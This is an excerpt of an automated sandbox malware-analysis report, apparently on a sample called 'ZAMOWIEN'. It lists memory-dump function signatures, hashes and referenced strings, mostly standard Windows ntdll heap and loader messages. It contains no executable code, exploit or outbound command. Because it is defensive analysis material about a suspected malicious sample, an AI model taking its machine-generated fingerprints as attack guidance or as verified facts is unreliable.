                                                                            • Instruction ID: 0b63fa57ad25e41b145117737888f195e535358452a529323b25dcbfc303c3e4
                                                                            • Opcode Fuzzy Hash: fa0efc86598d1852693cc4972e7cd8b935a6bafd27a44afe7dc413bf9acb8439
                                                                            • Instruction Fuzzy Hash: D7E1B078608741DFE715CF28C980B2AB7E0BF94358F140A5DF5A98B2E2DB74E945CB42
                                                                            Strings
                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 32815352
                                                                            • Kernel-MUI-Language-Allowed, xrefs: 3281527B
                                                                            • Kernel-MUI-Number-Allowed, xrefs: 32815247
                                                                            • WindowsExcludedProcs, xrefs: 3281522A
                                                                            • Kernel-MUI-Language-SKU, xrefs: 3281542B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                            • API String ID: 0-258546922
                                                                            • Opcode ID: da9221b4c9e65f9518045d79b96f701ac528bac1d369a48fb9771f32af369e1b
                                                                            • Instruction ID: 6a73c476cfebc60c0ec14601afd9e35f62cc98706ff6afa35c9286b2d27605b3
                                                                            • Opcode Fuzzy Hash: da9221b4c9e65f9518045d79b96f701ac528bac1d369a48fb9771f32af369e1b
                                                                            • Instruction Fuzzy Hash: DAF17DBAD01219EFDB06CFA8C980ADEBBB8BF08750F51405AE515F7250DB749E01CB90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: a0eb24fc69c5cd740ce04f7164a32f3940b0b96735c20750d7c74fb44b6fcc38
                                                                            • Instruction ID: 358afcd021f34495188ed58e8cfe1546663e80dbdb6a58f969fac526d8428857
                                                                            • Opcode Fuzzy Hash: a0eb24fc69c5cd740ce04f7164a32f3940b0b96735c20750d7c74fb44b6fcc38
                                                                            • Instruction Fuzzy Hash: 73F1197AE40A258FDB08CFACC89067DFBF5AF98210B19416DD85ADB384DB74E941CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: This is located in the %s field of the heap header.$ -~2`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                            • API String ID: 0-3549987426
                                                                            • Opcode ID: dea4f517cf09fbde8bd141ce163a0684fe01dbecd39ba2ef685672755f60d801
                                                                            • Instruction ID: 8e8843e300b8264e48ed75c7c2776388b7c5659326f6ecea22d9050260ca0f7e
                                                                            • Opcode Fuzzy Hash: dea4f517cf09fbde8bd141ce163a0684fe01dbecd39ba2ef685672755f60d801
                                                                            • Instruction Fuzzy Hash: BF31AA79102224EFE711CBA8C894F567BE8FF05B64F544055F805DB290EF75E940CE65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                            • API String ID: 0-3061284088
                                                                            • Opcode ID: 71ceb62c9adc2225437c7d5efce1c73b7a9c290739a898d8ddeddd0a4d1108c5
                                                                            • Instruction ID: d92112ac887c78cf0a41d5802944eec9363e54cb01641a0978821d34502685ab
                                                                            • Opcode Fuzzy Hash: 71ceb62c9adc2225437c7d5efce1c73b7a9c290739a898d8ddeddd0a4d1108c5
                                                                            • Instruction Fuzzy Hash: 3A01F77A4162A9DFE21A8728D41DF927FE8FB52770F24409AE0095FA91CFF4AC80C570
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: da2006b0e62679fb31dca3d8b873a43506e9a72bc93c46235dae22ab3b67aee7
                                                                            • Instruction ID: e858c53f375e9b43de3fe635ca86795330bb3e4ea17adb242892921cd9eb7e83
                                                                            • Opcode Fuzzy Hash: da2006b0e62679fb31dca3d8b873a43506e9a72bc93c46235dae22ab3b67aee7
                                                                            • Instruction Fuzzy Hash: 8013B178A00759EFEB15CF68C8907A9BBF1BF48304F14C569D859AB381DB74A981CF90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U|2
                                                                            • API String ID: 0-2651525024
                                                                            • Opcode ID: 7959b696e2e2293e70c5c5cd89f6b9010c964638d051d2a87b0c0c7acd7aa4a4
                                                                            • Instruction ID: b09dc5406e4a1cb974feedd1668694aa222bba91778b7420bd5d20549d16ff36
                                                                            • Opcode Fuzzy Hash: 7959b696e2e2293e70c5c5cd89f6b9010c964638d051d2a87b0c0c7acd7aa4a4
                                                                            • Instruction Fuzzy Hash: 0EB1C179A08705EFDB19CF69C980B9DB7B2BF48798F244429E811EB380DB35E840CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U|2${
                                                                            • API String ID: 0-541488698
                                                                            • Opcode ID: 4fe5f8e10a5e3dcc064088dd3413f7b71cb86aa4b322eb9772a14be83dbb066a
                                                                            • Instruction ID: e641856dcdbae43b447bcd49d9a33c6d6a655b225a05a5c59276d01b3413cbc4
                                                                            • Opcode Fuzzy Hash: 4fe5f8e10a5e3dcc064088dd3413f7b71cb86aa4b322eb9772a14be83dbb066a
                                                                            • Instruction Fuzzy Hash: 6691CFB9A08319DFEB15CF58C544BAE77B1FF08368F609195E814AF390DB799A40CB90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                            • API String ID: 0-2586055223
                                                                            • Opcode ID: e106cf257f9779e02207c3729413b4c99049f1c41eb085a5a69ac688de725158
                                                                            • Instruction ID: 5966d01e5a1484325d5c1ea01bb0782e3fbaac409deb5e02fb98e135c6c12694
                                                                            • Opcode Fuzzy Hash: e106cf257f9779e02207c3729413b4c99049f1c41eb085a5a69ac688de725158
                                                                            • Instruction Fuzzy Hash: FE61217A205784AFE312CB28C844F57B7E8FF84794F044468F9A59B691DF74E901CBA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                            • API String ID: 0-1391187441
                                                                            • Opcode ID: 983475433560facbfe009f26302cc6840c6555b0efdcfc6ac6d83fcdef2eb803
                                                                            • Instruction ID: b14449d01620b6a2e398597801412642446a46c50cf350cff2a72d683323bf1e
                                                                            • Opcode Fuzzy Hash: 983475433560facbfe009f26302cc6840c6555b0efdcfc6ac6d83fcdef2eb803
                                                                            • Instruction Fuzzy Hash: CA31AF7AA01219EFD702CB59C888F9ABBF9FF45764F104052E815AF291DB70ED40CA60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 89cde7088948242e2309c4d2fbbf63e381a5bbe56a6f98180abf8db24ef2d1ec
                                                                            • Instruction ID: aae596fa5e2e2817930210d2f3cd3a7ccbfa93b646f7afd30051c7454ed4e9bd
                                                                            • Opcode Fuzzy Hash: 89cde7088948242e2309c4d2fbbf63e381a5bbe56a6f98180abf8db24ef2d1ec
                                                                            • Instruction Fuzzy Hash: 17510178A04709FFEB09CB68C844BAEB7B1FF44754F204129E815AB394EBB49905CB80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                            • API String ID: 0-1168191160
                                                                            • Opcode ID: 3383d62fb376f89ff85b94a0cc48be9910ba706cb966b03b1c27e78555e389d1
                                                                            • Instruction ID: b481d3cd89c6c3d12a5e6783c287aebe91ec40f4fe00a5e5e05cc24656ebcd74
                                                                            • Opcode Fuzzy Hash: 3383d62fb376f89ff85b94a0cc48be9910ba706cb966b03b1c27e78555e389d1
                                                                            • Instruction Fuzzy Hash: 10F181BAA002288BDB21DF18CC90BD9B7B5FF44744F4480E9EA0CA7241EB759E85CF54
                                                                            Strings
                                                                            • HEAP: , xrefs: 327F1596
                                                                            • HEAP[%wZ]: , xrefs: 327F1712
                                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 327F1728
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: 4ffac0f5226d09ef044f140de0ae2a95a5cf14446294782e4ef8d8c5fd244557
                                                                            • Instruction ID: b73dd5f4f32305674dc192854bd88e26f20c73a054195448b0d76ed5c6c816e5
                                                                            • Opcode Fuzzy Hash: 4ffac0f5226d09ef044f140de0ae2a95a5cf14446294782e4ef8d8c5fd244557
                                                                            • Instruction Fuzzy Hash: 00E1DE78A08396AFE719CF68C450B7ABBE2BF48704F14845DE8969F346DB35E840CB50
                                                                            Strings
                                                                            • {, xrefs: 32853ABD
                                                                            • LdrpLoadResourceFromAlternativeModule, xrefs: 32853AAF
                                                                            • 'LDR: %s(), invalid image format of MUI file , xrefs: 32853AB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                            • API String ID: 0-1697150599
                                                                            • Opcode ID: c9dd088bb6510b235a67ac8add2a9f10909d74ac1e1fb0046edc58ae2cb65b2c
                                                                            • Instruction ID: 2dbe6683c9359342114b931103ebfc4f74936a3ac25f92e11624645dfb5b0074
                                                                            • Opcode Fuzzy Hash: c9dd088bb6510b235a67ac8add2a9f10909d74ac1e1fb0046edc58ae2cb65b2c
                                                                            • Instruction Fuzzy Hash: 06E1AB7960C385ABE305CF14C484B6BB7E2BF88788F50992DF9859B350DB72D945CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                            • API String ID: 0-2391371766
                                                                            • Opcode ID: d54aaa3cdf58a4c743869edf6160f82e5c520a237b3aa97d7c1230f8695fd8e8
                                                                            • Instruction ID: cae27f595f89dc63d42adf2097c132d47dfd148a186a86b123d0f0804b7f9fd3
                                                                            • Opcode Fuzzy Hash: d54aaa3cdf58a4c743869edf6160f82e5c520a237b3aa97d7c1230f8695fd8e8
                                                                            • Instruction Fuzzy Hash: 20B1D0B9605745AFE311CF58C880F5BB7E8FF44754F400829FA64AB280DBB4E854CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                            • API String ID: 0-318774311
                                                                            • Opcode ID: 6b58d37ec873123e8303c85022981ecf81338498bc9aa641b3471884f94f26c9
                                                                            • Instruction ID: 9bedcfd3753f56f2929d486d170a8d2e66287dd8c837231678035265d7c8c171
                                                                            • Opcode Fuzzy Hash: 6b58d37ec873123e8303c85022981ecf81338498bc9aa641b3471884f94f26c9
                                                                            • Instruction Fuzzy Hash: 65819BB9608341AFE311DB19C880F6AB7E8FF85754F404929FD989B390DB74D904CBA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                            • API String ID: 0-3870751728
                                                                            • Opcode ID: e0a412ef2248aa64819fc255632405d3850ad23204366add615dfe17f619d259
                                                                            • Instruction ID: 3b9e750288b597d987ef7a2db0838186f8511d808c7d78dfb1247894a267f932
                                                                            • Opcode Fuzzy Hash: e0a412ef2248aa64819fc255632405d3850ad23204366add615dfe17f619d259
                                                                            • Instruction Fuzzy Hash: D4913CB8E002159FEB14CF6DC480B9DBBB1BF48314F14C16AD919AB395EB759842CF94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %$&$@
                                                                            • API String ID: 0-1537733988
                                                                            • Opcode ID: 6afca61e04ad98596fb934cfdb4460b443d3a754b155c3c41754be86e2efcdfc
                                                                            • Instruction ID: 2aa9f62945a7d51fa9cf04142e593e68d1bf6b694ba85aacc245d20353d1b789
                                                                            • Opcode Fuzzy Hash: 6afca61e04ad98596fb934cfdb4460b443d3a754b155c3c41754be86e2efcdfc
                                                                            • Instruction Fuzzy Hash: 7971E27C609305DFE304CF25C980A1BBBE6FF84758F20891DE9A957290CB75D986CB92
                                                                            Strings
                                                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 328CB82A
                                                                            • GlobalizationUserSettings, xrefs: 328CB834
                                                                            • TargetNtPath, xrefs: 328CB82F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                            • API String ID: 0-505981995
                                                                            • Opcode ID: 68437f5118bbee642041b41f9cc739fe85baa50ad631bbcd9cebd4fe414d56c0
                                                                            • Instruction ID: c4430d8327d5f380f055a2c5caa7099b8ef6ceaf2226bb844decca99040f2631
                                                                            • Opcode Fuzzy Hash: 68437f5118bbee642041b41f9cc739fe85baa50ad631bbcd9cebd4fe414d56c0
                                                                            • Instruction Fuzzy Hash: 6A61BF76981638ABDB21CF58CC88BDAB7B8BF14755F0101E5A908AB250DB74DE84CF90
                                                                            Strings
                                                                            • HEAP: , xrefs: 3284E6B3
                                                                            • HEAP[%wZ]: , xrefs: 3284E6A6
                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3284E6C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                            • API String ID: 0-1340214556
                                                                            • Opcode ID: df3ae170bde1a4653f38a20223db80832e44a8ed3a3f2f8cfd1d0647a3e51cd9
                                                                            • Instruction ID: a0bb5f7db8383f1e6862d7f7eb1d496c43e3bf78daef27d1c9bd33fa8b0cd0df
                                                                            • Opcode Fuzzy Hash: df3ae170bde1a4653f38a20223db80832e44a8ed3a3f2f8cfd1d0647a3e51cd9
                                                                            • Instruction Fuzzy Hash: 0F513979600744EFE312CB68C845F9ABBF8FF05344F1040A5E955DB692DB74E941CB61
                                                                            Strings
                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 3285A589
                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 3285A59A
                                                                            • LdrpCompleteMapModule, xrefs: 3285A590
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                            • API String ID: 0-1676968949
                                                                            • Opcode ID: f4bcffb557afb20b1044ad79cb9732cab9215158922109ba160aa787df9d2817
                                                                            • Instruction ID: 39cb9a51b6083547b9002392c5cc03ae5adb347ad0900399e90352d86b3b2c05
                                                                            • Opcode Fuzzy Hash: f4bcffb557afb20b1044ad79cb9732cab9215158922109ba160aa787df9d2817
                                                                            • Instruction Fuzzy Hash: D351F1BC6007459FE711CB68C980B5A7BE4BF00B58F2806A5F9559B6E2DB75F840CB40
                                                                            Strings
                                                                            • HEAP: , xrefs: 3289DC1F
                                                                            • HEAP[%wZ]: , xrefs: 3289DC12
                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3289DC32
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                            • API String ID: 0-3815128232
                                                                            • Opcode ID: 054b27af1e5c72a483538963a6ff18b5a414bc9bb2cfae7d23a9843e838da808
                                                                            • Instruction ID: 1c7049a34557cd466a82e25e8a2a4fd350b4d20074b077ffd267595e123320c3
                                                                            • Opcode Fuzzy Hash: 054b27af1e5c72a483538963a6ff18b5a414bc9bb2cfae7d23a9843e838da808
                                                                            • Instruction Fuzzy Hash: D851247D104354CEF358EE29C8447F277E1EB5538CF804889E8C98B685DA76D847DB68
                                                                            Strings
                                                                            • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3284FB63
                                                                            • HEAP: , xrefs: 3284FB58
                                                                            • HEAP[%wZ]: , xrefs: 3284FB4B
                                                                            Memory Dump Source
